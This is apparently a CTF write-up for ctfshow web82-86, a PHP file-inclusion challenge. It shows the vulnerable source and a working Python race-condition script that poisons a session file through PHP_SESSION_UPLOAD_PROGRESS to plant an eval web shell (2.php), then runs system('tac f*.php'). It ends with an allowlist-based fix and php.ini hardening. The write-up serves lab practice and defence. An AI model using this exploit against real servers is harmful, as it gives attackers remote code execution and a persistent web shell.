ctfshow Web Beginner: File Inclusion 82-86, Race-Condition Script


web82-86

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    // Blacklist filter: strips "php", "data", ":" and "." so that stream
    // wrappers (php://, data:) and file extensions cannot be used directly.
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    // The remaining value is still included as-is, so any plain path without
    // those substrings (such as /tmp/sess_xxx) gets through.
    include($file);
}else{
    highlight_file(__FILE__);
}

This challenge relies on the PHP_SESSION_UPLOAD_PROGRESS parameter, which exists so a page can read a file upload's progress in real time. Even if the page never starts a session, as long as the cookie sent with the upload carries a PHPSESSID, PHP creates the matching file /tmp/sess_xxxxx in the default session directory, so we control the file name. To control the file's contents we use PHP_SESSION_UPLOAD_PROGRESS: if PHP_SESSION_UPLOAD_PROGRESS = "123", then /tmp/sess_xxx contains 123. PHP removes that progress data again once the upload finishes (session.upload_progress.cleanup is On by default), so the include has to be served in the short window while the file still holds our value, which is why the script runs uploads and includes in parallel.

Use the script directly:

import io, threading, requests

url = 'http://bb5282b9-dc00-44d5-98f0-1c93ed240d67.challenge.ctf.show:8080/'
sessionid = 'test'
# POST body sent with the include request; "\\$" keeps the literal "\$"
# so PHP does not interpolate $_POST inside the double-quoted string
data = {
    '1': 'file_put_contents("/var/www/html/2.php","<?php eval(\\$_POST[2]);?>");'
}

def write(session):
    # Keep uploading so the session file /tmp/sess_<sessionid> is
    # repeatedly recreated with the upload-progress value
    while 1:
        fileBytes = io.BytesIO(b'a' * 1024 * 500)
        response = session.post(url, data={
            "PHP_SESSION_UPLOAD_PROGRESS": "<?php eval($_POST[1]);?>"
        },
        cookies={
            'PHPSESSID': sessionid
        },
        files={
            'file': ('test.jpg', fileBytes)
        })
        # print(response.text)

def read(session):
    # Keep including the session file and check whether 2.php has appeared
    while 1:
        response = session.post(url + '?file=/tmp/sess_' + sessionid, data=data,
                                cookies={
                                    'PHPSESSID': sessionid
                                })
        response2 = session.get(url + '2.php')
        if response2.status_code == 200:
            print("+++++++++++done+++++++++++")
        else:
            print(response2.status_code)


if __name__ == '__main__':
    with requests.Session() as session:
        for i in range(5):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read, args=(session,)).start()

Then visit 2.php with the payload 2=system('tac f*.php'); and you are done.
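The root cause is that the include above filters a user-supplied path with a substring blacklist and then includes whatever remains. The hardened version below is an added example, not the challenge source, and the page names and the pages/ directory in it are assumptions for illustration: the request selects a logical name from a fixed allowlist, so no user-controlled path (session files, /proc entries, stream wrappers) ever reaches include().

```php
<?php
// Added hardening example (not the challenge source): replace the
// blacklist-based include with an allowlist of known page names.
// The page names and directory below are assumptions for illustration.

// Only these logical names may ever be included; the request never
// supplies a path, so /tmp/sess_* or stream wrappers cannot be reached.
const ALLOWED_PAGES = [
    'home'  => 'pages/home.php',
    'about' => 'pages/about.php',
];

function resolveInclude(string $name): ?string
{
    if (!array_key_exists($name, ALLOWED_PAGES)) {
        return null;
    }
    $path = realpath(__DIR__ . '/' . ALLOWED_PAGES[$name]);
    // realpath() returns false for missing files; also confirm the
    // resolved file still sits under this application directory.
    if ($path === false || strpos($path, __DIR__ . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

if (isset($_GET['file'])) {
    $path = resolveInclude((string) $_GET['file']);
    if ($path === null) {
        http_response_code(404);
        exit('unknown page');
    }
    include $path;
} else {
    highlight_file(__FILE__);
}
```

Two configuration points complement the code change. If the application does not use upload progress reporting, setting session.upload_progress.enabled = Off in php.ini stops PHP from writing request-controlled data into session files at all; and the default session.upload_progress.cleanup = On is exactly what makes the writeup's race necessary, so it should never be turned off. With the allowlist in place, neither setting is load-bearing for this bug, but they remove the attacker-controlled file from the picture entirely.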


Author: Rolemee
Copyright notice: Unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit Rolemee as the source when reproducing!